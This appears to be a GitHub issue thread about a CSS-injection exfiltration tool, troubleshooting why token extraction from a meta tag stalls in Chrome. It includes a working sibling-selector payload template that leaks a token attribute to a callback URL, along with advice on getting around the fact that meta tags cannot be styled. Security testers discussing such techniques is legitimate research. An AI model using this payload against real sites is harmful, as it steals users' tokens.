Problems while trying to exfiltrate <meta>

[makuga01]

I tried exfiltrating <meta> tag and it gets stuck - it makes 2 requests and then all other requests are set to pending. I have to click on meta in source code to continue exfiltrating. After doing this and clicking on request it says Stalled - clicking on Explaination I found out that it's queueing the requests for some of these reasons:

• There are higher priority requests.
• There are already six TCP connections open for this origin, which is the limit. Applies to HTTP/1.0 and HTTP/1.1 only.
• The browser is briefly allocating space in the disk cache

Is there any way this can be fixed or bypassed?

[d0nutptr]

Hey! Couple of things here..

In general, I pretty much handled all of the hard stuff (like 6 tcp connections) for you so that shouldn't be a problem. What I think is happening is that your style isn't actually being applied to the meta tag. I think, in my testing, I noted that the browser won't apply styles to meta tags so that might explain why it's not issuing callbacks.

If it were not a style issue, then you would expect to see a stalled /callback call in your network history.

That being said, if the token you're trying to exfiltrate is in the meta tag, I recommend reading my previous blog post Exfiltration via CSS Injection to learn about a way you can possibly apply the background image to a sibling of the meta tag instead of the meta tag itself (since it doesn't make sense for the browser to set a background for a tag that never visually appears in the page).

I'm going to close this since i'm pretty sure that's your issue. Thanks!

[d0nutptr]

(Also, if you read the blog post, you'll note that the "stalled" connection part is 100% intentional.)

[d0nutptr]

I just did a quick test to see if the sibling selector idea would work.

Html

<html>
    <body>
        <meta id="exfilme"></meta>
        <p>Pivot off of me</p>
        <style><!-- this is the injection point --></style>
    </body>
</html>

Template

meta[id^={{:token:}}] ~ * { background: url({{:callback:}}); }

I was able to exfil the token in this scenario because I applied the background style to the p as a result of the meta tag matching the attribute. However, in normal cases, you'll find the meta tag in the head and you might not be able to find a direct sibling you can apply the style to. Maybe you'll get lucky though.

I hope this helps!

[makuga01]

Thanks for help :D I used the sibling payload and still I have to click on some script or link tag (No luck with "stylable" elements in header :D) in order for it to work which makes no sense to me, it's like the style was applied when the element is being inspected and when I "click away" it stops sending requests. I guess I'm just gonna have to give up on this one 😕 Anyway it's great tool and I like it very very much

[d0nutptr]

@makuga01 Ahh! I know what you're seeing :P

When you open Chrome dev tools, chrome will issue a request for the image even if the element will never use the background. I think they do that so they can show a preview of the image in the dev tools (maybe).